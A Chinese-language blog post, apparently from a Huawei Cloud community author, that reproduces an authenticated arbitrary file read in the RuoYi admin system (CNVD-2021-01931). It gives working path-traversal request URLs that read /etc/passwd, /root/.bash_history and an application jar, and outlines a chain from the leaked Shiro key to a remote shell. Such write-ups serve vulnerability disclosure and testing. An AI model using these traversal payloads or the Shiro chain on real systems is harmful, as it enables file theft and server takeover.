若依后台任意文件读取(CNVD-2021-01931) 漏洞复现

举报
Vista_AX 发表于 2023/07/21 08:11:32 2023/07/21
5.5k+ 0 0
【摘要】 若依后台任意文件读取(CNVD-2021-01931) 漏洞复现

01 漏洞描述




若依管理系统是基于SpringBoot的权限管理系统,部分版本登录后台后可以读取服务器上的任意文件


02 影响范围


RuoYi < v4.5.1

03 验证方式


登录后台后,浏览器直接尝试访问如下链接,如能成功下载则说明存在漏洞
https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd

image.png


## 04 利用方式


若依系统采用shiro框架,利用思路为通过后台任意文件读取获取shiro的key值,而后使用shiro漏洞利用工具getshell。

1、利用任意文件下载读取.bash_history,通过.bash_history得知网站jar路径

http://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../root/.bash_history

image.png


2、再次利用任意文件下载漏洞,下载前一步得知的jar包

http://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../www/wwroot/xxx/rouyi-admin_bak.jar

image.png


3、在源码中寻找shiro的key值后,使用漏洞利用工具进行getshell

image.png

image.png


05 修复方案


请联系厂商获取修复后的官方版本:http://www.ruoyi.vip/

【声明】本内容来自华为云开发者社区博主,不代表华为云及华为云开发者社区的观点和立场。转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息,否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

作者其他文章

评论(0

抱歉,系统识别当前为高风险访问,暂不支持该操作

    全部回复

    上滑加载中

    设置昵称

    在此一键设置昵称,即可参与社区互动!

    *长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

    *长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。